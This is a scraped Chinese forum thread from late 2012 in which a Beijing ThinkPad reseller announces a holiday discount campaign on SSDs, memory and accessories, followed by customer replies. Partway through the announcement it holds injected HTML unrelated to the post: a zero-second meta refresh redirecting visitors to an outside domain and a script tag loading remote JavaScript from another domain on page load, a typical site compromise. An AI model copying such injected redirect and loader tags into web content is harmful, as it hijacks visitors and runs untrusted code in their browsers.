开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

双蛋活动开始,固态硬盘/原装内存/原装配件优惠可达328

关闭 [复制链接]
又是一年一度的年底促销日,翔意公司希望可以给各位带来能用且好用的实惠。
由于SSD的必要性,所以SSD必不可少成为这次双蛋活动的主角.

这次双蛋活动的优惠共分三个部分,可以单独使用,可以部分使用,也可以一起使用。
固态硬盘:是一个可以显著提高机器整体性能的部件,现在时机终于成熟,推荐SSD时代。
原装内存:原装盒装内存,8G容量才完美。
原装配件:所谓好马配好鞍,ThinkPad这么高级的笔记本配一个假包假鼠标未免太寒酸了。

活动时间:
12月24日开始---1月3日结束

活动内容:(购机用户)
凡在活动期间购买ThinkPad笔记本的用户:享受三个特定类项目配件优惠。
1:固态硬盘:无论您升级SSD还是加mSATA SSD,均可享受128元优惠。
2:原装内存:购买4G DDR3 1600盒装原装内存优惠100
3:原装配件:购买翔意公司除固态硬盘和原装内存类配件,优惠100元

活动内容:(非购机翔意老客户)
1:固态硬盘单购享受:100元优惠
2:笔记本服务:风扇加油重涂硅脂服务免费(价值100元)
3:翔意销售的全部配件每种均优惠20元现金

一些解释:
1:购买套餐或者单机均可享受此优惠活动。
1:三个优惠可以一起使用,当您购买同类配件的时候就可以直接优惠。
2:本活动与翔意其他优惠活动排斥(发帖,老客户,排排站等),不能一起使用。您可以选择参加双蛋活动或者参加论坛常规优惠活动。
3:本活动与晒单活动不排斥,可以一起使用
4:SSD我们尽量保证充足货源,但是为确保万无一失,请购买前联系翔意公司客服预定。
5:如还有任何问题,请联系翔意客服解答。
<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

真的很好啊
活动依然很给力啊.
加mSATA SSD更值了
沙发没抢着啊,还有比我早的.
很给力啊
昨天刚拿的机器-_-///去之前还问最近有没有活动,说没有::>_<:: ::>_<:: ::>_<:: ::>_<::
给力哦 {:soso_e113:}
tszmsid 发表于 2012-12-23 23:24  沙发没抢着啊,还有比我早的.

昨天下午拿的机器::>_<:: ::>_<:: ::>_<:: ::>_<:: ::>_<:: ::>_<:: 哭
被渁殗屍の漁 发表于 2012-12-24 08:45
昨天下午拿的机器::>______

没问我吧{:soso_e143:}
8G内存的X1c还有货吗
yesterday006 发表于 2012-12-24 09:34
8G内存的X1c还有货吗

没现货 需要预定. 2天到货. 交定金300元
定金地址: http://item.taobao.com/item.htm?id=13999062584
很给力的活动,要出手的可以出手了。
春节前的最后一次活动,需要的看过来啦{:soso__16984349925490629196_1:}
年底有购机需求的朋友抓紧吧,一般春节前后都会缺货,而且也不会再有活动了。
活动终于出来了.
忙完年底这些事就出手了
EddieFan 发表于 2012-12-24 15:19
年底有购机需求的朋友抓紧吧,一般春节前后都会缺货,而且也不会再有活动了。 ...

我那么问有没有活动,老大早一点都不透漏{:soso_e149:}
tszmsid 发表于 2012-12-24 09:13
没问我吧

问的李雪{:soso_e149:}
活动终于出来了{:soso_e100:}
老大都说了,年底再也不会有活动了 :)
早知道晚点换ssd了
问的李雪

之前真的不知道,发帖时我都进入梦香。次日才看到
不要再犹豫了,赶紧借活动加个SSD 再优惠100.{:soso_e113:}
问了半天客服,客服不是不理 就是说不知道,我是原来的购机用户,请问单买固态硬盘到底有没有优惠???

活动内容:(非购机翔意老客户)
1:固态硬盘单购享受:100元优惠

这个到底是不是针对以前的老用户出的活动政策?
relax 发表于 2012-12-28 10:54
问了半天客服,客服不是不理 就是说不知道,我是原来的购机用户,请问单买固态硬盘到底有没有优惠???

...

是的,只要是翔意用户目前购买ssd都可以享受100元优惠
买机器赶上好时机了